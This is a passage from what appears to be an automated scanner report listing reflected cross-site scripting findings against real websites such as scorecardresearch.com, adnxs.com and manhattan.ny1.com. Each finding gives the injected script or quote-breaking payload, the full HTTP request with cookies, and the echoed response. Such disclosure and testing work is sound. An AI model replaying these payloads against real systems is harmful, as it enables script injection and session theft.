COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"a8c59<script>alert(1)</script>cf2ea45f930", c6:"", c10:"", c15:"", c16:"", r:""});

2.18. http://b.scorecardresearch.com/beacon.js [c6 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload e1892<script>alert(1)</script>f5ea083f0b1 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=e1892<script>alert(1)</script>f5ea083f0b1&c15=&tm=277901 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.aeriagames.com/meebo.html?network=aeriagames&lang=en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 08 Apr 2011 18:17:21 GMT
Date: Fri, 01 Apr 2011 18:17:21 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"e1892<script>alert(1)</script>f5ea083f0b1", c10:"", c15:"", c16:"", r:""});

2.19. http://event.adxpose.com/event.flow [uid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://event.adxpose.com
Path:	/event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload a065c<script>alert(1)</script>581d91e7aaa was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-8825891582215045%26output%3Dhtml%26h%3D250%26slotname%3D9743825372%26w%3D300%26lmt%3D1301699500%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.quickyellow.com%252F%26dt%3D1301681500418%26bpp%3D2%26shv%3Dr20110324%26jsv%3Dr20110321-2%26prev_slotnames%3D8282812667%26correlator%3D1301681500450%26frm%3D0%26adk%3D3051422498%26ga_vid%3D1234146098.1301681501%26ga_sid%3D1301681501%26ga_hid%3D936317177%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1118%26bih%3D1004%26fu%3D0%26ifi%3D2%26dtd%3D145%26xpc%3DHEyqJzw6JK%26p%3Dhttp%253A%2F%2Fwww.quickyellow.com&uid=ZC45X9Axu6NOUFfX_289669a065c<script>alert(1)</script>581d91e7aaa&xy=0%2C0&wh=300%2C250&vchannel=69112&cid=166308&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8825891582215045&output=html&h=250&slotname=9743825372&w=300&lmt=1301699500&flash=10.2.154&url=http%3A%2F%2Fwww.quickyellow.com%2F&dt=1301681500418&bpp=2&shv=r20110324&jsv=r20110321-2&prev_slotnames=8282812667&correlator=1301681500450&frm=0&adk=3051422498&ga_vid=1234146098.1301681501&ga_sid=1301681501&ga_hid=936317177&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1118&bih=1004&fu=0&ifi=2&dtd=145&xpc=HEyqJzw6JK&p=http%3A//www.quickyellow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=69a5d959-2383-46d3-a91e-54766c81e851

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B3FB1CE06E81EFF05A150AFF904264C8; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 145
Date: Fri, 01 Apr 2011 18:11:16 GMT

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("ZC45X9Axu6NOUFfX_289669a065c<script>alert(1)</script>581d91e7aaa");

2.20. http://ib.adnxs.com/ab [cnd parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4fb3'-alert(1)-'79dc16e5093 was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ab?enc=pHA9CtcjI0CkcD0K1yMjQAAAAEAzMwtApHA9CtcjI0CkcD0K1yMjQJhmvdWWfkEfvNv2i6g_Cj43FZZNAAAAAOguAAC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gCkDGUAuQ4BAgUCAAQAAAAAPB_ZjAAAAAA.&tt_code=vert-377&udj=uf%28%27a%27%2C+9797%2C+1301681467%29%3Buf%28%27c%27%2C+47580%2C+1301681467%29%3Buf%28%27r%27%2C+173255%2C+1301681467%29%3Bppv%288991%2C+%272252220474958112408%27%2C+1301681467%2C+1301724667%2C+47580%2C+25553%29%3B&cnd=!TA_hmwjc8wIQx8kKGAAg0ccBKGUxMzMzEdcjI0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYpBlgAGiWBQ..e4fb3'-alert(1)-'79dc16e5093&referrer=http://www.quickyellow.com/&pp=TZYVNgAPLUAK5TqOQQlfYZle0E2L5OGhqjK3xg&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOd_6NhWWTcDaPI71lAfhvqWIBNfq-NMBl6GU7Bi3zOLcHAAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi04ODI1ODkxNTgyMjE1MDQ1oAHD8v3sA7IBE3d3dy5xdWlja3llbGxvdy5jb226AQozMDB4MjUwX2FzyAEJ2gEbaHR0cDovL3d3dy5xdWlja3llbGxvdy5jb20vmAK6QMACBMgChdLPCqgDAegD-QLoA7kI6APgKugDA_UDAAAAxIAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtzZABCUPOVkuk1oyP0KbF8tqkl9SQ%26client%3Dca-pub-8825891582215045%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8825891582215045&output=html&h=250&slotname=9743825372&w=300&lmt=1301699500&flash=10.2.154&url=http%3A%2F%2Fwww.quickyellow.com%2F&dt=1301681500418&bpp=2&shv=r20110324&jsv=r20110321-2&prev_slotnames=8282812667&correlator=1301681500450&frm=0&adk=3051422498&ga_vid=1234146098.1301681501&ga_sid=1301681501&ga_hid=936317177&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1118&bih=1004&fu=0&ifi=2&dtd=145&xpc=HEyqJzw6JK&p=http%3A//www.quickyellow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEIuCUQChgBIAEoATD4qtPsBBD4qtPsBBgA; sess=1; uuid2=4470455573253905340; anj=Kfw)mCZ#-r-!gzoh^Cqhjkv(+'n*Ar?/j9C?^6hwKS-6T#`5PBojYbRuf<Ll1I1_hYMhYeh%G6vYp*t5ODvAzTZ@iISJjXDc'nh[thoDjVDOn>OkjdhM-]kxuVc<-j^0E[S._]n?/-AkZL.5?T2G#A#U]+VwBupzlO^jt'sib/l$cNheGq(khOe'bw8d`euB.cj?qbq-gA!pj6^1%-h#Y:>8>-aA1s%>+2VKHUo:D4$wXYcPJa0pV6(yoKtkH4iSC7Y0![RCC#S9MDO7fT+LqQ2Bn!Cm+LoEJ1Rj9dTlZBSd-<H%U!v%'=cs)G=s5$$Fuh<-Uuf/c-H3lH#jqd6Oap3Jn<XaPzn`'kW8x490>]R9YwPWP84i@Tft^.$7hboq>5:RM_$2tI+t4y?]Wh$S3mfg$(rmoM+#rsOr%N_18#>u)Ad68T3rF<u@3GoUxqQuHeiMw`Mqgp3o`Lp^?sA:$+jr?'sLsp$GL52tA2rb_L7O9%tUm:mmr=Ma5rfGjl=`EA9k>54kg-mIfrsmD+)e>dAw+wgM1Z6.B++zP/-x-<YUx13AHx9m9EVCQ[0t>Lec_mi9=M5ckg9If?r2d=YvFi3W?kOv*'yK4EBNS-X-8(dO4`JtpvlG@^Em+X<s'_Bt4b*wzi%NN%0Y)2hh5+<oT@8?Dc@POarr%:v7cD'2OHF=bSuBlUCX?Nxf8N^Nh4>i5l%cKbE6+*6BP+`-(g2TYeYWq2wwO<::r`4Y

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 02-Apr-2011 18:11:41 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4470455573253905340; path=/; expires=Thu, 30-Jun-2011 18:11:41 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=4470455573253905340; path=/; expires=Thu, 30-Jun-2011 18:11:41 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)nCZ(]G)J7/O]F%-R2Z:f5>iQ*BYsWzvY8.)nH<$2.XWJWtjGv+4w]%yLG4BGFFn:P$AZ#Gz+-$TeEYm*.e'pf613v0MVm*_^3DJ=UIpYC@cXq-NpFHIkuVc<N=z-FiJ>g#l^L=JY]hp-mYdSLPGRC`g81EObM7iN.f%puar10yPY-[7]F9>i(B_A3PcZVmL-3uUR<*D:Qns%he1n7(1ZkiLgKp9q?U5$Ij`[VKooNc(D*%gjgqY9:!2[S.8mFdR^`1sGPsjV%G.tZzP+pC7Us+-Gmo'gHOO9VN]#I#>z$1O.0n0]FCI)%$irNtLYKGrLFm?FDH?kJHg+BL8j#t/3=LC`!k_10x0APpn$po_.%Qrn5LKaG+C:>+KYM0vexr#o3CPNpSS3kDk`leH`z(>e$g8?BhTnnjEm8JQCKDrol@l(u:QKVyn#'yiFkQ%d_+5c9>HA[f#/bkaeo7jYo1ntF*U'L(DV:gm_r3?R0pK7!>Tv<m$?W3RCIi/.ivIuiY(k1nU(`.z8Dj+=knZI=n]L=W?OG7<xts(:v/JJN_J+xBHp18UKoBo/f9tnWq6lZ`#sAsO(QR'fx#CerhiCJA+y5zwFJ5#.8wD((3pHou4zn%-.N6!/.qkDJsjN/f->S93^CKwybouKV%kLp#)1q.ZX-E+g*^mmMS.NzjYWVBukjw`z_T5).wO]n@%1hYVo>bCP78jEMPvt4wzX^D(M%?3m#wp)VawZvyQv7l4F6_lnT=.2<-wStTMc; path=/; expires=Thu, 30-Jun-2011 18:11:41 GMT; domain=.adnxs.com; HttpOnly
Date: Fri, 01 Apr 2011 18:11:41 GMT
Content-Length: 1458

document.write('<scr' + 'ipt language=\"Javascript\"><!--\n amgdgt_p=\"5112\";\n amgdgt_pl=\"bad56300\"; \n amgdgt_t = \"i\";\n amgdgt_clkurl = \"http://ib.adnxs.com/click/AAAAAACAIEAAAAAAAIAgQAAA
...[SNIP]...
OguAAC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gCkDGUAuQ4BAgUCAAQAAAAAjBvFyAAAAAA./cnd=!TA_hmwjc8wIQx8kKGAAg0ccBKGUxMzMzEdcjI0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYpBlgAGiWBQ..e4fb3'-alert(1)-'79dc16e5093/referrer=http%3A%2F%2Fwww.quickyellow.com%2F/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBOd_6NhWWTcDaPI71lAfhvqWIBNfq-NMBl6GU7Bi3zOLcHAAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Y
...[SNIP]...

2.21. http://manhattan.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://manhattan.ny1.com
Path:	/App_Skins/news1/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4fd7'%3b4584f664dff was submitted in the REST URL parameter 1. This input was echoed as d4fd7';4584f664dff in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /App_Skinsd4fd7'%3b4584f664dff/news1/favicon.ico HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=154287268.1301681489.1.1.utmcsr=ny1.com|utmccn=(referral)|utmcmd=referral|utmcct=/favicon.ico; __utma=154287268.1094085944.1301681489.1301681489.1301681489.1; __utmc=154287268; __utmb=154287268.1.10.1301681489; s_cc=true; s_sq=%5B%5BB%5D%5D; session_id=1733305373; daily_id=1733305373; user_id=1733305373; _chartbeat2=t5h1gz8ikos4d109

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:11:29 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56082
Vary: Accept-Encoding
Cache-Control: public, max-age=550
Expires: Fri, 01 Apr 2011 18:20:40 GMT
Date: Fri, 01 Apr 2011 18:11:30 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?404;http://manhattan.ny1.com:80/App_Skinsd4fd7';4584f664dff/news1/favicon.ico'; var gRegionSelected = '5';//]]>
...[SNIP]...

2.22. http://manhattan.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://manhattan.ny1.com
Path:	/App_Skins/news1/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6514e'%3bd51675d856b was submitted in the REST URL parameter 2. This input was echoed as 6514e';d51675d856b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /App_Skins/news16514e'%3bd51675d856b/favicon.ico HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=154287268.1301681489.1.1.utmcsr=ny1.com|utmccn=(referral)|utmcmd=referral|utmcct=/favicon.ico; __utma=154287268.1094085944.1301681489.1301681489.1301681489.1; __utmc=154287268; __utmb=154287268.1.10.1301681489; s_cc=true; s_sq=%5B%5BB%5D%5D; session_id=1733305373; daily_id=1733305373; user_id=1733305373; _chartbeat2=t5h1gz8ikos4d109

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:11:41 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56080
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Expires: Fri, 01 Apr 2011 18:21:42 GMT
Date: Fri, 01 Apr 2011 18:11:42 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?404;http://manhattan.ny1.com:80/App_Skins/news16514e';d51675d856b/favicon.ico'; var gRegionSelected = '5';//]]>
...[SNIP]...

2.23. http://manhattan.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://manhattan.ny1.com
Path:	/App_Skins/news1/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acaf1'%3b7079e6feb81 was submitted in the REST URL parameter 3. This input was echoed as acaf1';7079e6feb81 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /App_Skins/news1/favicon.icoacaf1'%3b7079e6feb81 HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=154287268.1301681489.1.1.utmcsr=ny1.com|utmccn=(referral)|utmcmd=referral|utmcct=/favicon.ico; __utma=154287268.1094085944.1301681489.1301681489.1301681489.1; __utmc=154287268; __utmb=154287268.1.10.1301681489; s_cc=true; s_sq=%5B%5BB%5D%5D; session_id=1733305373; daily_id=1733305373; user_id=1733305373; _chartbeat2=t5h1gz8ikos4d109

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:11:52 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56170
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Expires: Fri, 01 Apr 2011 18:21:53 GMT
Date: Fri, 01 Apr 2011 18:11:53 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?aspxerrorpath=/App_Skins/news1/favicon.icoacaf1';7079e6feb81/default.aspx'; var gRegionSelected = '5';//]]>
...[SNIP]...

2.24. http://manhattan.ny1.com/Content/ServeContent.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://manhattan.ny1.com
Path:	/Content/ServeContent.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42631'%3bc0299a9928d was submitted in the REST URL parameter 1. This input was echoed as 42631';c0299a9928d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /Content42631'%3bc0299a9928d/ServeContent.aspx?id=709&ticks=813226 HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Referer: http://manhattan.ny1.com/content/top_stories/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=tsgnewsglobal1%2Ctsgny1%3D%2526pid%253D/favicon.ico%2526pidt%253D1%2526oid%253Dhttp%25253A//manhattan.ny1.com/content/top_stories/%2526ot%253DA; __utmz=154287268.1301681489.1.1.utmcsr=ny1.com|utmccn=(referral)|utmcmd=referral|utmcct=/favicon.ico; __utma=154287268.1094085944.1301681489.1301681489.1301681489.1; __utmc=154287268; __utmb=154287268.1.10.1301681489

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:11:01 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56119
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Expires: Fri, 01 Apr 2011 18:21:02 GMT
Date: Fri, 01 Apr 2011 18:11:02 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?aspxerrorpath=/Content42631';c0299a9928d/ServeContent.aspx'; var gRegionSelected = '5';//]]>
...[SNIP]...

2.25. http://manhattan.ny1.com/Content/ServeContent.aspx [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://manhattan.ny1.com
Path:	/Content/ServeContent.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86be6'%3b2133abcc347 was submitted in the REST URL parameter 2. This input was echoed as 86be6';2133abcc347 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /Content/ServeContent.aspx86be6'%3b2133abcc347?id=709&ticks=813226 HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Referer: http://manhattan.ny1.com/content/top_stories/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=tsgnewsglobal1%2Ctsgny1%3D%2526pid%253D/favicon.ico%2526pidt%253D1%2526oid%253Dhttp%25253A//manhattan.ny1.com/content/top_stories/%2526ot%253DA; __utmz=154287268.1301681489.1.1.utmcsr=ny1.com|utmccn=(referral)|utmcmd=referral|utmcct=/favicon.ico; __utma=154287268.1094085944.1301681489.1301681489.1301681489.1; __utmc=154287268; __utmb=154287268.1.10.1301681489

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:11:07 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56167
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Expires: Fri, 01 Apr 2011 18:21:09 GMT
Date: Fri, 01 Apr 2011 18:11:09 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?aspxerrorpath=/Content/ServeContent.aspx86be6';2133abcc347/default.aspx'; var gRegionSelected = '5';//]]>
...[SNIP]...

2.26. http://manhattan.ny1.com/Content/ServeResource.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://manhattan.ny1.com
Path:	/Content/ServeResource.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdf4b'%3b8443ca8f92f was submitted in the REST URL parameter 1. This input was echoed as bdf4b';8443ca8f92f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /Contentbdf4b'%3b8443ca8f92f/ServeResource.aspx?id=687&ticks=1915729545 HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Referer: http://manhattan.ny1.com/Content/ServeContent.aspx?iframe=1&id=687&ticks=1915729545
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=tsgnewsglobal1%2Ctsgny1%3D%2526pid%253D/favicon.ico%2526pidt%253D1%2526oid%253Dhttp%25253A//manhattan.ny1.com/content/top_stories/%2526ot%253DA; __utmz=154287268.1301681489.1.1.utmcsr=ny1.com|utmccn=(referral)|utmcmd=referral|utmcct=/favicon.ico; __utma=154287268.1094085944.1301681489.1301681489.1301681489.1; __utmc=154287268; __utmb=154287268.1.10.1301681489

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:11:04 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56125
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Expires: Fri, 01 Apr 2011 18:21:06 GMT
Date: Fri, 01 Apr 2011 18:11:06 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?aspxerrorpath=/Contentbdf4b';8443ca8f92f/ServeResource.aspx'; var gRegionSelected = '5';//]]>
...[SNIP]...

2.27. http://manhattan.ny1.com/Content/ServeResource.aspx [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://manhattan.ny1.com
Path:	/Content/ServeResource.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa860'%3b7174f58ce9f was submitted in the REST URL parameter 2. This input was echoed as fa860';7174f58ce9f in the application's response.

